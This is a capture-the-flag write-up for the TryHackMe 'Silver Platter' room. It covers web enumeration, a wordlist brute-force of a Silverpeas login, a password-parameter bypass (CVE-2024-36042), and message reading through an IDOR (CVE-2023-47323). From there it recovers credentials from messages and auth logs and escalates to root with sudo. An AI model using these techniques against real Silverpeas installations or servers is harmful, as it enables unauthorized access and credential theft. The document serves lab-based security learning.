###### tags: `ctf` `escalation` `web` `unix` `thm` `writeup` https://tryhackme.com/r/room/silverplatter ### Investigate the Site **Using ffuf:** ``` sh $ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.50.131/FUZZ assets [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 72ms] images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 72ms] index.html [Status: 200, Size: 14124, Words: 926, Lines: 346, Duration: 74ms] ``` **Using dirb:** ```sh $ dirb http://10.10.50.131/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt ``` **Using Gobuster:** ``` sh $ gobuster dir --url http://10.10.50.131/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt ``` Only three elements were found (including two directories). Disabled JavaScript in the browser and found additional information not visible in the HTML5 version. One form was found. Tried to send any data to the form, but every time I received a `405 Not Allowed` response. Tried checking the proxy on port 8080, but nothing was found. On the contact page, I found the following information: `If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".` **What is Silverpeas?** Googled it and found: ``` Silverpeas is an open-source, rich, and scalable intranet software that will help you distribute, exchange, store, and quickly find the information at the heart of your organization. ``` This indicates that the organization might have this software installed on its web servers. --- ### Internal Portal Tried checking the portal on both web servers (ports 80 and 8080). The server is up on port 8080: `http://10.10.50.131:8080/silverpeas/defaultLogin.jsp` Googled for known vulnerabilities in Silverpeas and found useful links: - [CVE-2023-47322](https://www.cvedetails.com/cve/CVE-2023-47322/) - [GitHub (CVE-2023-47322)](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47322) - [Rhino Security Labs Research](https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/) These vulnerabilities appear relevant to our case: - **CVE-2023-47323**: [GitHub Link](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47323) - **CVE-2023-47322** --- Tried logging in with the following credentials: - User `test` - **Login or password incorrect** - User `scr1ptkiddy` - **Login or password incorrect** Used the "Give me a new password..." option: - For user `test`: **Login or password incorrect** - For user `scr1ptkiddy`: Received the following message: ``` Reset your password An email has been sent to the email address associated with your account. This message explains how to get a new password. Some time may be required prior to receiving this message. Remember to verify the message has not gone into your spam folder. ``` This confirms that the user `scr1ptkiddy` exists in the system. --- ### Brute-Forcing the Password We have the username `scr1ptkiddy` and can try brute-forcing the password. Since global password lists didn’t work, I decided to extract words directly from the site using the following tool: `cewl http://site_ip > passwords.txt` Next, I used the **Intruder** module from **Burp Suite** to brute-force the password. ![[Pasted image 20250121160537.png]] A password was found: `ad......ng`. Alternatively, we could bypass the password entry using [**CVE-2024-36042**](https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d) **Bypass Options**: 1. Use **Burp Suite Intruder** to delete the password parameter. 2. Use the browser's **Inspector** tool to delete the block containing the password parameter. This provided access to the portal as an administrator. --- ### Exploiting Messages Using CVE-2023-47323 Once logged in, I tested if I could read other users' messages using **CVE-2023-47323**: ``` Proof-of-Concept Exploit: The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between users, including administrators. URL format: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] ``` Tested this on the target: ``` http://site_ip:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=1 ``` The first message was successfully read: ![[Pasted image 20250121160939.png]] To read all other messages, I used **Burp Intruder** again: ![[Pasted image 20250121161229.png]] There were six messages in total, one of which contained SSH credentials for the user `tim`. --- ### Gaining SSH Access Logged in to the server using the credentials found in the message. Once logged in, I located the `user.txt` file containing the user flag. --- ### Root Flag To escalate privileges, I checked the following vectors: - `sudo` - `suid` - `crontab` None revealed immediate issues. Then I checked the OS version: ``` $uname -a Linux silver-platter 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux ``` Searched for vulnerabilities in this version: https://vulmon.com/searchpage?q=linux+linux+kernel+5.15&sortby=byriskscore --- ### Testing Exploits Ran `linux-exploit-suggester` to find kernel vulnerabilities: `./les.sh` Results: - **CVE-2022-0847** (Dirty Pipe): Tested but not successful. - **CVE-2021-4034** (PwnKit): Tested but not successful. - **CVE-2021-3156** (Baron Samedit): Not applicable here. No kernel exploit proved useful. --- ### Investigating Further The user `tim` is a member of the **adm** group, allowing access to logs in `/var/log`. Searched for sensitive information: `grep root -R /var/log/* | grep -i pass` Found a log entry for a Docker command executed by user `tyler`: ``` /var/log/auth.log.2:Dec 13 15:44:30 silver-platter sudo: tyler : COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd......3/ ... ``` The password for `tyler` is `_Z.........3/`. Logged in as `tyler` and checked sudo privileges: ``` tyler@silver-platter:/home/tim$ sudo -l [sudo] password for tyler: Matching Defaults entries for tyler on silver-platter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User tyler may run the following commands on silver-platter: (ALL : ALL) ALL ``` Used `sudo su` to switch to root. Located the root flag in the root directory. # bonus ``` Silverpeas version is 6.3.1 Silverpeas is running on WildFly Full 26.1.1.Final (WildFly Core 18.1.1.Final) - 2.2.17.Final with the Servlet API 4.0 The server is running on Linux 5.15.0-91-generic amd64 with Ubuntu OpenJDK 64-Bit Server VM 11.0.20.1+1-post-Ubuntu-0ubuntu120.04 ```